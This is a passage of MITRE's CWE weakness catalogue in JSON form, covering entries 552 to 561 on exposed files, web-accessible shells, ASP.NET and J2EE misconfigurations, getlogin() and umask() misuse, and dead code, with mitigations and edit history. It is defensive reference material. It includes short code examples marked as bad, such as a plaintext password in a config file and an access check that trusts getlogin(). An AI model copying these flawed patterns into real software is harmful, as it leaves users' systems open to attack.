performed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"URL Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated and processed for authorization. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Authentication Before Parsing and Canonicalization","attr":{"@_Date":"2008-04-11"}}}},"552":{"attr":{"@_ID":"552","@_Name":"Files or Directories Accessible to External Parties","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product makes files or directories accessible to unauthorized actors, even though they should not be.","Extended_Description":"Web servers, FTP servers, and similar servers may store a set of files underneath a \\"root\\" directory that is accessible to the server\'s users.  Applications may store sensitive files underneath this root without also using access control to limit which users may request those files, if any.  Alternately, an application might package multiple files or directories into an archive file (e.g., ZIP or tar), but the application might not exclude sensitive files that are underneath those directories.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO15-C","Entry_Name":"Ensure that file operations are performed in a secure directory"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"639"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Organization":"Veracode","Modification_Date":"2010-09-09","Modification_Comment":"Suggested OWASP Top Ten mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Errant Files or Directories Accessible","attr":{"@_Date":"2008-04-11"}}}},"553":{"attr":{"@_ID":"553","@_Name":"Command Shell in Externally Accessible Directory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A possible shell file exists in /cgi-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Installation","System Configuration"],"Description":"Remove any Shells accessible under the web root folder and children directories."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"650"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Possible Command Shell (csh)","attr":{"@_Date":"2008-04-11"}}}},"554":{"attr":{"@_ID":"554","@_Name":"ASP.NET Misconfiguration: Not Using Input Validation Framework","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The ASP.NET application does not use an input validation framework.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Use the ASP.NET validation framework to check all program input before it is processed by the application. Example uses of the validation framework include checking to ensure that:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Phone number fields contain only valid characters in phone numbers","Boolean values are only \\"T\\" or \\"F\\"","Free-form strings are of a reasonable length and composition"]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"ASP.NET Misconfiguration: Input Validation","attr":{"@_Date":"2008-04-11"}}}},"555":{"attr":{"@_ID":"555","@_Name":"J2EE Misconfiguration: Plaintext Password in Configuration File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The J2EE application stores a plaintext password in a configuration file.","Extended_Description":"Storing a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resource, making it an easy target for attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"260","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not hardwire passwords into your software."},{"Phase":"Architecture and Design","Description":"Use industry standard libraries to encrypt passwords before storage in configuration files."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Below is a snippet from a Java properties file in which the LDAP server password is stored in plaintext.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword","xhtml:br":""}}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Password in Configuration File","attr":{"@_Date":"2008-04-11"}}}},"556":{"attr":{"@_ID":"556","@_Name":"ASP.NET Misconfiguration: Use of Identity Impersonation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Configuring an ASP.NET application to run with impersonated credentials may give the application unnecessary privileges.","Extended_Description":"The use of impersonated credentials allows an ASP.NET application to run with either the privileges of the client on whose behalf it is executing or with arbitrary privileges granted in its configuration.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use the least privilege principle."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"ASP.NET Misconfiguration: Identity Impersonation","attr":{"@_Date":"2008-04-11"}}}},"558":{"attr":{"@_ID":"558","@_Name":"Use of getlogin() in Multithreaded Application","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses the getlogin() function in a multithreaded context, potentially causing it to return incorrect values.","Extended_Description":"The getlogin() function returns a pointer to a string that contains the name of the user associated with the calling process. The function is not reentrant, meaning that if it is called from another process, the contents are not locked out and the value of the string can be changed by another process. This makes it very risky to use because the username can be changed by other processes, so the results of the function cannot be trusted.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"663","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control","Other"],"Impact":["Modify Application Data","Bypass Protection Mechanism","Other"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Using names for security purposes is not advised. Names are easy to forge and can have overlapping user IDs, potentially causing confusion or impersonation."},{"Phase":"Implementation","Description":"Use getlogin_r() instead, which is reentrant, meaning that other processes are locked out from changing the username."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code relies on getlogin() to determine whether or not a user is trusted. It is easily subverted.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"pwd = getpwnam(getlogin());if (isTrustedGroup(pwd-&gt;pw_gid)) {} else {}","xhtml:br":"","xhtml:div":[{"#text":"allow();","attr":{"@_style":"margin-left:10px;"}},{"#text":"deny();","attr":{"@_style":"margin-left:10px;"}}]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: Authentication"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Misused Authentication: getlogin()","attr":{"@_Date":"2008-04-11"}}}},"560":{"attr":{"@_ID":"560","@_Name":"Use of umask() with chmod-style Argument","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product calls umask() with an incorrect argument that is specified as if it is an argument to chmod().","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"687","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Files or Directories","Modify Files or Directories","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use umask() with the correct argument."},{"Phase":"Testing","Description":"If you suspect misuse of umask(), you can use grep to spot call instances of umask()."}]},"Notes":{"Note":{"#text":"Some umask() manual pages begin with the false statement: \\"umask sets the umask to mask &amp; 0777\\" Although this behavior would better align with the usage of chmod(), where the user provided argument specifies the bits to enable on the specified file, the behavior of umask() is in fact opposite: umask() sets the umask to ~mask &amp; 0777. The documentation goes on to describe the correct usage of umask(): \\"The umask is used by open() to set initial file permissions on a newly-created file. Specifically, permissions in the umask are turned off from the mode argument to open(2) (so, for example, the common umask default value of 022 results in new files being created with permissions 0666 &amp; ~022 = 0644 = rw-r--r-- in the usual case where the mode is specified as 0666).\\"","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Other_Notes"}],"Previous_Entry_Name":{"#text":"Often Misused: umask()","attr":{"@_Date":"2008-04-11"}}}},"561":{"attr":{"@_ID":"561","@_Name":"Dead Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains dead code, which can never be executed.","Extended_Description":"Dead code is source code that can never be executed in a running program. The surrounding code makes it impossible for a section of code to ever be executed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Quality Degradation","Note":"Dead code that results from code that can never be executed is an indication of problems with the source code that needs to be fixed and is an indication of poor quality."},{"Scope":"Other","Impact":"Reduce Maintainability"}]},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode Quality Analysis","Compare binary / bytecode to application permission manifest"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Automated Monitored Execution"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Permission Manifest Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source Code Quality Analyzer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Warning Flags","Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Remove dead code before deploying the application."},{"Phase":"Testing","Description":"Use a static analysis tool to spot dead code."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The condition for the second if statement is impossible to satisfy. It requires that the variables be non-null, while on the only path where s can be assigned a non-null value there is a return statement.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"String s = null;if (b) {}if (s != null) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"s = \\"Yes\\";return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"Dead();","attr":{"@_style":"margin-left:10px;"}}]}}},{"Intro_Text":"In the following class, two private methods call each other, but since neither one is ever invoked from anywhere else, they are both dead code.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DoubleDead {}","xhtml:div":{"#text":"private void doTweedledee() 